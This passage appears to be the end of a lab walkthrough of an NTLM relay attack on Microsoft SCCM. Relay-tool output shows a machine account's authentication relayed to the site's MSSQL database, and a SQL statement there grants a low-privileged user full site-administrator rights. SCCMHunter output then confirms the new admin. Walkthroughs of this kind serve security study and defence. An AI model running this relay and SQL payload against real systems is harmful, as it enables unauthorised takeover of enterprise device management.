[2024-08-17 16:12:15] [*] Protocol Client LDAPS loaded..
[2024-08-17 16:12:15] [*] Protocol Client IMAPS loaded..
[2024-08-17 16:12:15] [*] Protocol Client IMAP loaded..
[2024-08-17 16:12:15] [*] Running in relay mode to single host
[2024-08-17 16:12:15] [*] Setting up SMB Server
[2024-08-17 16:12:15] [*] Setting up HTTP Server on port 80
[2024-08-17 16:12:15] [*] Setting up WCF Server
[2024-08-17 16:12:15] [*] Setting up RAW Server on port 6666

[2024-08-17 16:12:15] [*] Servers started, waiting for connections
[2024-08-17 16:12:35] [*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.60.11, attacking target mssql://192.168.60.12
[2024-08-17 16:12:35] [*] Authenticating against mssql://192.168.60.12 as SCCMLAB/MECM$ SUCCEED
[2024-08-17 16:12:35] [*] Executing SQL: DECLARE @AdminID INT; USE CM_P01; INSERT INTO RBAC_Admins (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, CreatedDate, ModifiedBy, ModifiedDate, SourceSite) SELECT 0x010500000000000515000000FCDE497C9CAFE5E38944A6FA5A040000, 'SCCMLAB\carol', 0, 0, '', '', '', '', 'P01' WHERE NOT EXISTS ( SELECT 1 FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol' ); SET @AdminID = (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'); INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID) SELECT @AdminID, RoleID, ScopeID, ScopeTypeID FROM (VALUES  ('SMS0001R', 'SMS00ALL', 29), ('SMS0001R', 'SMS00001', 1), ('SMS0001R', 'SMS00004', 1) ) AS V(RoleID, ScopeID, ScopeTypeID) WHERE NOT EXISTS ( SELECT 1 FROM RBAC_ExtendedPermissions  WHERE AdminID = @AdminID  AND RoleID = V.RoleID  AND ScopeID = V.ScopeID AND ScopeTypeID = V.ScopeTypeID );
[2024-08-17 16:12:35] [*] SMBD-Thread-7 (process_request_thread): Connection from 192.168.60.11 controlled, but there are no more targets left!
[2024-08-17 16:12:35] [*] SMBD-Thread-8 (process_request_thread): Connection from 192.168.60.11 controlled, but there are no more targets left!
[2024-08-17 16:12:35] [*] ENVCHANGE(DATABASE): Old Value: master, New Value: CM_P01
[2024-08-17 16:12:35] [*] INFO(MSSQL): Line 1: Changed database context to 'CM_P01'.

Our low privileged user, Carol should now be a site administrator;

python3 sccmhunter.py admin -u carol@sccm.lab  -p 'SCCMftw' -ip 192.168.60.11                              

SCCMHunter v1.0.5 by @garrfoster
[16:13:21] INFO     [!] Enter help for extra shell commands 
                                                                                                                                                                                                                                                                                                                                                                                       
() C:\ >> show_admins
[16:13:27] INFO     Tasked SCCM to list current SMS Admins.                                                                                                                                                                                                      
[16:13:27] INFO     Current Full Admin Users:                                                                                                                                                                                                                    
[16:13:27] INFO     SCCMLAB\Administrator                                                                                                                                                                                                                        
[16:13:27] INFO     SCCMLAB\SCCM-Admins                                                                                                                                                                                                                          
[16:13:27] INFO     SCCMLAB\carol                                                                                                                                                                                                                                

In Conclusion

There are a number of other attacks against SCCM, particularly in relation to relaying which I’ll be looking into in future.